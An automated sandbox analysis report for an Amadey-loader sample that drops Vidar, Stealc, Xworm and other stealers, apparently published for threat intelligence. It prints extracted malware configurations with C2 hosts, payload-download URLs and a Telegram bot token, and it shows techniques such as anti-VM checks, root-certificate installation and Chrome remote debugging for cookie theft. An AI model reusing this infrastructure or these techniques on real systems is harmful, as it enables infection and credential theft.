amadey | 91cb26a8c61b268414be31010f6a8e894bca70579775d4e1f0acc32da3201e12

Analysis

max time kernel
40s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22/02/2025, 07:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5f8da7bbdafaed3095a2fef9f7caf45c.exe
Size

2.0MB
MD5

5f8da7bbdafaed3095a2fef9f7caf45c
SHA1

595731a346e573a217c1030789f8dbf930280dc7
SHA256

91cb26a8c61b268414be31010f6a8e894bca70579775d4e1f0acc32da3201e12
SHA512

f8a01fdb8ad387de77dd9937046f32841540740c418adf101de0029710e7af0b66ed0930f89bf9d1ee28c6b4f151c57bd5b9f512026e0f177fa63826d974ea11
SSDEEP

49152:blUpxSuxR0/pUg5eJStVgOBnpujtzqqPRrM01GEZ3rQPzBwvtYyfRvaX2A:blUpxBxR0/pzeguObytzqarj/JYtwvna

Score

10^/10

amadey healer povertystealer stealc systembc vidar xworm 9c9aa5 a4d2cd reno credential_access defense_evasion discovery dropper execution rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

vidar

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

http://cobolrationumelawrtewarms.com

http://�� jlgenfekjlfnvtgpegkwr.xyz

Attributes

install_dir
a58456755d
install_file
Gxtuum.exe
strings_key
00fadbeacf092dfd58b48ef4ac68f826
url_paths
/3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

systembc

towerbingobongoboom.com

93.186.202.3

Attributes

dns
5.132.191.104

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Poverty Stealer Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1692-296-0x00000000000E0000-0x0000000000524000-memory.dmp	family_povertystealer

Detect Vidar Stealer 27 IoCs

stealer

resource	yara_rule
behavioral1/memory/2076-60-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-57-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-55-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-53-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-63-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2952-186-0x0000000000400000-0x0000000000850000-memory.dmp	family_vidar_v7
behavioral1/memory/2708-194-0x0000000006E10000-0x0000000007254000-memory.dmp	family_vidar_v7
behavioral1/memory/2952-249-0x0000000000400000-0x0000000000850000-memory.dmp	family_vidar_v7
behavioral1/memory/2708-403-0x0000000006E10000-0x0000000007254000-memory.dmp	family_vidar_v7
behavioral1/memory/2952-468-0x0000000000400000-0x0000000000850000-memory.dmp	family_vidar_v7
behavioral1/memory/2952-717-0x0000000000400000-0x0000000000850000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-826-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-845-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-864-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-891-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2952-979-0x0000000000400000-0x0000000000850000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-992-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1032-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1035-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1057-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1076-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1080-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1099-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1127-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1150-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2076-1154-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/2952-1237-0x0000000000400000-0x0000000000850000-memory.dmp	family_vidar_v7

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x000f00000001a4d8-801.dat	family_xworm
behavioral1/memory/1580-807-0x0000000000E80000-0x0000000000EB0000-memory.dmp	family_xworm
behavioral1/memory/1724-1919-0x00000000013C0000-0x00000000013F0000-memory.dmp	family_xworm

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral1/memory/3704-973-0x0000000000B00000-0x0000000000F66000-memory.dmp	healer
behavioral1/memory/3704-974-0x0000000000B00000-0x0000000000F66000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7nSTXG6.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1728	powershell.exe
1344	powershell.exe
928	powershell.exe
3880	powershell.exe
3972	powershell.exe
4044	powershell.exe

Downloads MZ/PE file 18 IoCs

flow	pid	Process
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe
5	2708	skotes.exe

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
756	chrome.exe
3000	chrome.exe
2600	chrome.exe
352	chrome.exe
2236	chrome.exe
2916	chrome.exe
3348	chrome.exe
2112	chrome.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7nSTXG6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7nSTXG6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe

Executes dropped EXE 9 IoCs

pid	Process
2708	skotes.exe
2524	7aencsM.exe
2076	7aencsM.exe
2116	MAl7pjE.exe
1668	lwtLxxH.exe
2952	7nSTXG6.exe
1776	ebp51gY.exe
1692	ftS1RPn.exe
2616	8QQOJj9.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	MAl7pjE.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	7nSTXG6.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	ftS1RPn.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	8QQOJj9.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine	skotes.exe

Loads dropped DLL 19 IoCs

pid	Process
2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe
2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe
2708	skotes.exe
2524	7aencsM.exe
2628	WerFault.exe
2628	WerFault.exe
2628	WerFault.exe
2628	WerFault.exe
2628	WerFault.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe
2708	skotes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000b00000001a4de-887.dat	autoit_exe
behavioral1/files/0x000a00000001a52f-1244.dat	autoit_exe
behavioral1/files/0x000a00000001961d-1320.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe
2708	skotes.exe
2116	MAl7pjE.exe
2952	7nSTXG6.exe
1692	ftS1RPn.exe
2616	8QQOJj9.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2524 set thread context of 2076	2524	7aencsM.exe	34

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	5f8da7bbdafaed3095a2fef9f7caf45c.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2628	2524	WerFault.exe	33

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7nSTXG6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7nSTXG6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7nSTXG6.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
3220	timeout.exe
3988	timeout.exe
3672	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4020	taskkill.exe
1612	taskkill.exe
1596	taskkill.exe
3272	taskkill.exe
2156	taskkill.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	ebp51gY.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ebp51gY.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ebp51gY.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2012	schtasks.exe
2864	schtasks.exe
3392	schtasks.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe
2708	skotes.exe
2116	MAl7pjE.exe
2116	MAl7pjE.exe
2116	MAl7pjE.exe
2116	MAl7pjE.exe
2116	MAl7pjE.exe
2952	7nSTXG6.exe
1692	ftS1RPn.exe
2952	7nSTXG6.exe
2616	8QQOJj9.exe
2952	7nSTXG6.exe
2112	chrome.exe
2112	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe
2112	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 2708	2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe	31
PID 2372 wrote to memory of 2708	2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe	31
PID 2372 wrote to memory of 2708	2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe	31
PID 2372 wrote to memory of 2708	2372	5f8da7bbdafaed3095a2fef9f7caf45c.exe	31
PID 2708 wrote to memory of 2524	2708	skotes.exe	33
PID 2708 wrote to memory of 2524	2708	skotes.exe	33
PID 2708 wrote to memory of 2524	2708	skotes.exe	33
PID 2708 wrote to memory of 2524	2708	skotes.exe	33
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2076	2524	7aencsM.exe	34
PID 2524 wrote to memory of 2628	2524	7aencsM.exe	35
PID 2524 wrote to memory of 2628	2524	7aencsM.exe	35
PID 2524 wrote to memory of 2628	2524	7aencsM.exe	35
PID 2524 wrote to memory of 2628	2524	7aencsM.exe	35
PID 2708 wrote to memory of 2116	2708	skotes.exe	37
PID 2708 wrote to memory of 2116	2708	skotes.exe	37
PID 2708 wrote to memory of 2116	2708	skotes.exe	37
PID 2708 wrote to memory of 2116	2708	skotes.exe	37
PID 2708 wrote to memory of 1668	2708	skotes.exe	39
PID 2708 wrote to memory of 1668	2708	skotes.exe	39
PID 2708 wrote to memory of 1668	2708	skotes.exe	39
PID 2708 wrote to memory of 1668	2708	skotes.exe	39
PID 2708 wrote to memory of 2952	2708	skotes.exe	40
PID 2708 wrote to memory of 2952	2708	skotes.exe	40
PID 2708 wrote to memory of 2952	2708	skotes.exe	40
PID 2708 wrote to memory of 2952	2708	skotes.exe	40
PID 2708 wrote to memory of 1776	2708	skotes.exe	41
PID 2708 wrote to memory of 1776	2708	skotes.exe	41
PID 2708 wrote to memory of 1776	2708	skotes.exe	41
PID 2708 wrote to memory of 1776	2708	skotes.exe	41
PID 2708 wrote to memory of 1692	2708	skotes.exe	42
PID 2708 wrote to memory of 1692	2708	skotes.exe	42
PID 2708 wrote to memory of 1692	2708	skotes.exe	42
PID 2708 wrote to memory of 1692	2708	skotes.exe	42
PID 2708 wrote to memory of 2616	2708	skotes.exe	44
PID 2708 wrote to memory of 2616	2708	skotes.exe	44
PID 2708 wrote to memory of 2616	2708	skotes.exe	44
PID 2708 wrote to memory of 2616	2708	skotes.exe	44
PID 2952 wrote to memory of 2112	2952	7nSTXG6.exe	45
PID 2952 wrote to memory of 2112	2952	7nSTXG6.exe	45
PID 2952 wrote to memory of 2112	2952	7nSTXG6.exe	45
PID 2952 wrote to memory of 2112	2952	7nSTXG6.exe	45
PID 2112 wrote to memory of 2592	2112	chrome.exe	46
PID 2112 wrote to memory of 2592	2112	chrome.exe	46
PID 2112 wrote to memory of 2592	2112	chrome.exe	46
PID 2112 wrote to memory of 2316	2112	chrome.exe	47
PID 2112 wrote to memory of 2316	2112	chrome.exe	47
PID 2112 wrote to memory of 2316	2112	chrome.exe	47
PID 2112 wrote to memory of 2424	2112	chrome.exe	48
PID 2112 wrote to memory of 2424	2112	chrome.exe	48
PID 2112 wrote to memory of 2424	2112	chrome.exe	48
PID 2112 wrote to memory of 2424	2112	chrome.exe	48
PID 2112 wrote to memory of 2424	2112	chrome.exe	48
PID 2112 wrote to memory of 2424	2112	chrome.exe	48

C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe
"C:\Users\Admin\AppData\Local\Temp\5f8da7bbdafaed3095a2fef9f7caf45c.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2372
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2076
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:352
